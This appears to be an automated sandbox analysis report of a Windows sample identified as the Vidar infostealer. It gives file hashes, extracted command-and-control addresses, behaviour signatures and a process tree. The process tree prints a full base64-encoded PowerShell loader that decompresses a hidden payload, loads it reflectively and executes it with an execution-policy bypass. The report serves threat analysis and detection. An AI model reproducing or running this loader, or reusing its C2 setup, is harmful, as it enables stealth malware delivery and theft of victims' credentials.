Analysis

  • max time kernel
    150s
  • max time network
    155s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-03-2024 06:33

General

  • Target

    55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe

  • Size

    271KB

  • MD5

    8b8db4eaa6f5368eb5f64359c6197b43

  • SHA1

    e9b51842e2d2f39fa06e466ae73af341ddffe1c8

  • SHA256

    55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77

  • SHA512

    4da734da30af148f246f433b71c72677b9f78698424db15eba364233dff183cb998f9be13d2832872829ac545be1e15ff75ceb85fca3fd0784265fd576db0056

  • SSDEEP

    6144:xfL+oq+hnjsVl3dRQTLU+2bRRR17+fYHPfIMDPSBJ7Y/B4aSi3V:xfL5njsVlNuc++Rj17+fYHPfIg4Y54ap

Malware Config

Extracted

Family

vidar

Version

8.6

Botnet

72f54d93118188013f2386eef7e5cc05

C2

https://steamcommunity.com/profiles/76561199658817715

https://t.me/sa9ok

Attributes
  • profile_id_v2

    72f54d93118188013f2386eef7e5cc05

  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36

Signatures

  • Detect Vidar Stealer 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe
    "C:\Users\Admin\AppData\Local\Temp\55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1032
    • C:\Windows\SysWOW64\wscript.exe
      "wscript.exe" "C:\Users\Admin\start.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2560
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2704
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiLXRlbXAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KSW52b2tlLUV4cHJlc3Npb24gJGRlY29kZWRTdHJpbmcNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCI=')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2504
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3168
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
              PID:4192
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 2368
                6⤵
                • Program crash
                PID:3148
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4192 -ip 4192
      1⤵
        PID:3436

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\-temp.ps1
        Filesize

        1KB

        MD5

        ee6d2d219d1affb98fb9dc1de51d895e

        SHA1

        aaa2ceb5f7214c76b8a050a06d257cdc30d6bb48

        SHA256

        017fb2bedc94f0480d208611df6b42589d407fc4338e1f5dc1e00a9fd52752e0

        SHA512

        52139b56af32835b93fb8eb93b553325e36654debe5c15e6b61930ffe8027e0ee5eb0998da4c37ec047c052522a022d7103c33d7495eb1a3504cfee1780229bf

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        1KB

        MD5

        c0636f2d138baca01dbb2eedb99bf3d5

        SHA1

        3b927899db0f3e2cb510782592887dc02fc3e400

        SHA256

        10973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a

        SHA512

        0187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        16KB

        MD5

        9e1f42b8da1880f702f72994f8535c61

        SHA1

        f65ac248ffc7856a5fe496b625d1b57f041513f7

        SHA256

        65655de4c57bb2e6dab3c51c2a605de0063fe83e1d1c9ed8c667551ece41f4f6

        SHA512

        35f2b43e7dad39ac2e54275e05a8f1f2ddfe764fba4cef4ee1570f6785c822dd7af579becfa701efcaaabab8844fd6943f062e438a44f6e1e51d081a657cdaa6

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_djyaa3h2.2ks.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\start.vbs
        Filesize

        231B

        MD5

        abe1dd23ab4c11aae54f1898c780c0b5

        SHA1

        bb2f974b3e0af2baa40920b475582bfd4fb28001

        SHA256

        89054e19532a9a62ca3403a8899495bf6f06557ff886b475a04227eb8aba7b12

        SHA512

        e9ec437a32301078ea69ce2f36dadab68315d5e56d94c4d579d3409ccbe0c9e00c3aed7baa0fa6d656fb8ed23213f4c01fb2d108c1a0ed11c58c76cd00f9a99d

      • C:\Users\Admin\temp.bat
        Filesize

        204KB

        MD5

        72b17467a49b7813856fa604d1d291c8

        SHA1

        3116d07854d56f0bc505be8b80804a7319208739

        SHA256

        e24aaddfa2ece0891ad7b3c51779c65bbf95e4fded59fc46fe4fef311e1de3e1

        SHA512

        38c99cc716097ee7cb642203432ffbd1ef6ce8a0c9b21aa2827962b82456ecb3113fa1edd362aab013737e3bdfb2d0803145fc0caf612054ba47f6454c3a4843

      • memory/2504-13-0x0000000005B80000-0x0000000005BE6000-memory.dmp
        Filesize

        408KB

      • memory/2504-11-0x00000000052F0000-0x0000000005312000-memory.dmp
        Filesize

        136KB

      • memory/2504-12-0x0000000005B10000-0x0000000005B76000-memory.dmp
        Filesize

        408KB

      • memory/2504-10-0x0000000005470000-0x0000000005A9A000-memory.dmp
        Filesize

        6.2MB

      • memory/2504-9-0x0000000004E30000-0x0000000004E40000-memory.dmp
        Filesize

        64KB

      • memory/2504-22-0x0000000005BF0000-0x0000000005F47000-memory.dmp
        Filesize

        3.3MB

      • memory/2504-23-0x00000000060B0000-0x00000000060CE000-memory.dmp
        Filesize

        120KB

      • memory/2504-24-0x00000000060F0000-0x000000000613C000-memory.dmp
        Filesize

        304KB

      • memory/2504-25-0x0000000004E30000-0x0000000004E40000-memory.dmp
        Filesize

        64KB

      • memory/2504-26-0x0000000007A00000-0x000000000807A000-memory.dmp
        Filesize

        6.5MB

      • memory/2504-27-0x00000000071B0000-0x00000000071CA000-memory.dmp
        Filesize

        104KB

      • memory/2504-31-0x00000000751C0000-0x0000000075971000-memory.dmp
        Filesize

        7.7MB

      • memory/2504-8-0x0000000004E30000-0x0000000004E40000-memory.dmp
        Filesize

        64KB

      • memory/2504-6-0x0000000002CF0000-0x0000000002D26000-memory.dmp
        Filesize

        216KB

      • memory/2504-7-0x00000000751C0000-0x0000000075971000-memory.dmp
        Filesize

        7.7MB

      • memory/3168-36-0x0000000002FA0000-0x0000000002FB0000-memory.dmp
        Filesize

        64KB

      • memory/3168-50-0x0000000008030000-0x00000000085D6000-memory.dmp
        Filesize

        5.6MB

      • memory/3168-35-0x00000000061D0000-0x0000000006527000-memory.dmp
        Filesize

        3.3MB

      • memory/3168-33-0x00000000751C0000-0x0000000075971000-memory.dmp
        Filesize

        7.7MB

      • memory/3168-47-0x0000000002FA0000-0x0000000002FB0000-memory.dmp
        Filesize

        64KB

      • memory/3168-48-0x00000000079E0000-0x0000000007A76000-memory.dmp
        Filesize

        600KB

      • memory/3168-49-0x0000000007760000-0x0000000007782000-memory.dmp
        Filesize

        136KB

      • memory/3168-34-0x0000000002FA0000-0x0000000002FB0000-memory.dmp
        Filesize

        64KB

      • memory/3168-52-0x0000000007B00000-0x0000000007B58000-memory.dmp
        Filesize

        352KB

      • memory/3168-53-0x0000000006590000-0x000000000659A000-memory.dmp
        Filesize

        40KB

      • memory/3168-55-0x0000000077D71000-0x0000000077E93000-memory.dmp
        Filesize

        1.1MB

      • memory/3168-69-0x00000000751C0000-0x0000000075971000-memory.dmp
        Filesize

        7.7MB

      • memory/4192-58-0x0000000000400000-0x0000000000644000-memory.dmp
        Filesize

        2.3MB

      • memory/4192-60-0x0000000000400000-0x0000000000644000-memory.dmp
        Filesize

        2.3MB

      • memory/4192-54-0x0000000000400000-0x0000000000644000-memory.dmp
        Filesize

        2.3MB